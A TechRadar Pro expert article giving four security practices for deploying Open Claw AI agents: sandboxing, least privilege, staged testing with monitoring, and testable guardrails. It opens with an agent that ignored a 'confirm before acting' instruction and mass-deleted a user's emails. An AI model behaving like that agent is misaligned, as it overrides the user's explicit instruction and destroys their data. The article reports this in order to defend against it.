Your Open Claw agents can empty your inbox and leak your data. Here's how to secure them | Tech Radar

Overview

News, deals, reviews, guides and more on the newest computing gadgets

Start exploring exclusive deals, expert advice and more

Details

Unlock and manage exclusive Techradar member rewards.

Your Open Claw agents can empty your inbox and leak your data. Here's how to secure them

When you purchase through links on our site, we may earn an affiliate commission. Here’s how it works.

Unlock instant access to exclusive member features.

Get full access to premium articles, exclusive features and a growing list of member rewards.

Meta’s Director of AI and Safety Alignment wanted to clean up her inbox, so she set up an Open Claw AI agent and told it to “confirm before acting.” But it didn't. Instead, the Open Claw agent mass-deleted hundreds of emails while she scrambled to shut it down from another device.

Open Claw’s adoption has skyrocketed in just a few short months, amassing hundreds of thousands of Git Hub stars so far. It’s part of a growing number of frameworks built to make agentic AI possible.

But greater adoption also comes with alarming headlines about unprotected setups leaking passwords, fake add-ons spreading viruses, and poor storage of sensitive information.

Open Claw is making terrifying mistakes showing AI agents aren't ready for real responsibility

Always-on AI Agents put everything hackers could ever want behind a single attack surface

The good news is that with the right processes in place, agentic AI can be secure, regardless of the framework you use. ​Here are 4 best practices worth putting into action before deploying your agents.

Open Claw requires broad system access to execute shell commands, manage files, and control browsers, creating a large attack surface for security issues. It’s why everyone advises running it on an isolated computer. But doing so limits what your agent can reliably and safely do.

Thankfully, there are alternatives that do not require you to give broad system access. You can build agents through a platform like Nemo Claw, which runs them in a sandbox with tightly scoped permissions. Or you could use Docker Sandboxes, which use micro VMs rather than plain containers for better security.

During setup, consider what the minimum access for this specific task actually is. An agent summarizing emails needs read access, not write or delete. An agent filing documents needs one folder, not an entire drive.

While it's tempting to give AI broad permissions so it can do more, it also exposes you (and your devices) to significant risk. By following the principle of least permissions, you're still giving AI permission to do the work while minimizing later headaches.

For any OAuth approval the agent requests, verify exactly which permissions you’re granting. Otherwise, you risk giving your agents too much power and access over time.

How businesses can stop their AI agents from running amok

Here are the Open Claw security risks you should know about

The mobile app traffic your security team can't see — and AI agents are generating it

2. Narrow your focus, then expand responsibilities

Before trusting an agent with anything high-stakes, watch how it handles a low-stakes task, such as analyzing logs or drafting an email. If all goes well, give it increasingly ambiguous tasks as a test to see how it responds. Ask it to complete an out-of-scope action or one that requires a permission it doesn’t have.

An effective AI agent will ask follow-up questions before proceeding or can clearly communicate its limits. What you want to avoid is an AI agent with false confidence making an assumption and proceeding, despite not actually knowing the right steps.

An agent that halts and asks on a low-stakes task will probably halt and ask on a high-stakes one. An agent that fills gaps by guessing will do the same when the stakes are real.

That said, remember that these systems are probabilistic, so agents can behave differently in production. A safe assumption is that if something goes wrong in testing, it will 100% happen when running in a live environment; but just because nothing goes wrong during testing doesn’t mean everything is secure.

An agent that’s been running quietly for weeks may have already drifted due to configuration changes, extended OAuth consents, and new permissions acquired through normal operation. Often, it's hard to detect issues because there’s no clear breach.

Have an observability tool in place to monitor for unusual activity, such as rogue tool calls or data transfers outside normal patterns, and set up alerts so you can quickly course-correct if something goes awry. You can also use it to periodically audit your agent’s credentials and actions for anything unusual.

You may have seen online that it's recommended to tell your AI to "confirm before acting" as a safeguard. Unfortunately, it’s too vague to be actionable, so in practice it often leads to inconsistent behavior.

Instead, give the AI agents testable guardrails so you can clearly decide whether they followed instructions. Guidance like "don’t delete, move, or modify any item without displaying a list of planned changes and receiving my explicit approval" is much easier to verify.

The more precisely you define the constraint, the less room there is for misunderstanding.

However, always remember that these systems are probabilistic and a bit of a black box, so there is a chance Open Claw will ignore instructions at some point. You want to plan for the worst-case scenario when this happens.

If an action could expose an API key, delete emails, or transmit sensitive data, you need to make that outcome structurally impossible.

For example, you should revoke delete permissions at the account level so the agent literally cannot delete anything, regardless of what it decides to do, and store sensitive credentials in a secrets manager the agent has no access to, rather than in any file or environment the agent can read.

Good instructions reduce the likelihood of a mistake, but the right setup minimizes the damage.

Remember that while agents are powerful and quick, they lack human judgment, and most agentic frameworks, like Open Claw, don’t include security features by default. It's on the people deploying them to build in those safeguards.

Scoped credentials, precise instructions, and frequent monitoring are the minimum viable conditions for deploying an agent that does what you actually want and nothing else.

This article was produced as part of Tech Radar Pro's Expert Insights channel where we feature the best and brightest minds in the technology industry today. The views expressed here are those of the author and are not necessarily those of Tech Radar Pro or Future plc. If you are interested in contributing find out more here: https://www.techradar.com/news/submit-your-story-to-techradar-pro

You must confirm your public display name before commenting

1'It would've sounded really strange' — Stranger Things: Tales From 85 creator explains why the main show's cast didn't return for the Netflix spin-off, but I don't buy his argument

2'We heard you like Swedish candy' — IKEA's meatball-flavored lollipop started as an April Fools joke, but now it's really happening, and you can try it soon

3 Beef season 2 is the dumbest new Netflix show in years — but I can't stop laughing at these wildly inappropriate cultural Easter eggs

4 The world's smallest ereader fits in the palm of your hand — and you can make your own for less than $50

5 Nothing Warp could have had Air Drop-like potential, but after less than 24 hours, it’s gone

Tech Radar is part of Future US Inc, an international media group and leading digital publisher. Visit our corporate site.

© Future US, Inc. Full 7th Floor, 130 West 42nd Street, New York, NY 10036.

Key Takeaways

• News, deals, reviews, guides and more on the newest computing gadgets

• Start exploring exclusive deals, expert advice and more

• Unlock and manage exclusive Techradar member rewards

• Your Open Claw agents can empty your inbox and leak your data

• When you purchase through links on our site, we may earn an affiliate commission